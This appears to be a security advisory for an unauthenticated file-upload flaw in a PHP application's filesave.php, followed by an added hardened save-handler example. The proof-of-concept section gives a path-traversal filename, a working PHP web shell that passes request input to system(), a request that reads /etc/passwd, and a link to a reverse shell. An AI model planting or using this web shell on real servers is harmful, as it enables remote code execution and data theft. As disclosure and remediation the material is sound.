Unrestricted file upload allows any unauthenticated user to execute arbitrary code on the server.
Details
/www/include/filesave.php allows any file to be uploaded to any location. If an attacker uploads a PHP file, they can execute code on the server. https://cwe.mitre.org/data/definitions/434.html
PoC
Using the default configuration, intercept the POST request used to save the settings in Burp Suite.
Rename the file to ../shell.php
Replace the data with the following:
<?php
echo "Beaux was here ";
system($_REQUEST['cmd']);
?>
In a browser, go to:
http://x.x.x.x/shell.php?cmd=cat%20/etc/passwd
Here is a video demo:
https://youtu.be/FEXuw5GJW-Y
A full reverse shell would also work:
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
Impact
Remote code execution allows an unauthenticated attacker to run arbitrary code on the server.
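A hardened save handler for the weakness described under Details, as an added example that is not the project's filesave.php: it requires an authenticated caller, accepts only an allowlisted file name, and writes to one fixed directory outside the web root. The directory, the extension list, both function names, and the assumption that the request carries a file name and its contents as two fields are illustrative.

```php
<?php
declare(strict_types=1);
// Added example, not the project's filesave.php. SAVE_DIR, ALLOWED_EXT and
// both function names are assumptions made for illustration.
const SAVE_DIR = '/var/lib/app/settings';    // assumed; outside the web root
const ALLOWED_EXT = ['json', 'ini', 'conf']; // assumed settings formats

/** Absolute destination for a client-supplied name, or null if rejected. */
function safe_destination(string $name, string $baseDir = SAVE_DIR): ?string
{
    // One dot, no "/", "\", ".." or NUL: "../shell.php" and "a.php.json" both fail.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,8})\z/', $name, $m)) {
        return null;
    }
    // Allowlist of extensions, never a denylist of ".php" variants.
    if (!in_array(strtolower($m[1]), ALLOWED_EXT, true)) {
        return null;
    }
    $base = realpath($baseDir);   // canonical form of the fixed directory
    if ($base === false || !is_dir($base)) {
        return null;
    }
    return $base . DIRECTORY_SEPARATOR . $name;
}

/** Returns the HTTP status the endpoint should send. */
function handle_save(bool $authenticated, string $name, string $data): int
{
    if (!$authenticated) {
        return 401;               // the advisory's request needed no login
    }
    $dest = safe_destination($name);
    if ($dest === null) {
        error_log('filesave: rejected name ' . json_encode($name));
        return 400;
    }
    return file_put_contents($dest, $data, LOCK_EX) !== false ? 200 : 500;
}

// Constructed inputs: the file name from the PoC, then a plausible settings file.
foreach (['../shell.php', 'shell.php', 'settings.json'] as $candidate) {
    $dest = safe_destination($candidate, sys_get_temp_dir());
    printf("%-14s => %s\n", $candidate, $dest ?? 'rejected');
}
```

Keeping the save directory outside the document root means that a file which does get written is never served or executed by the web server.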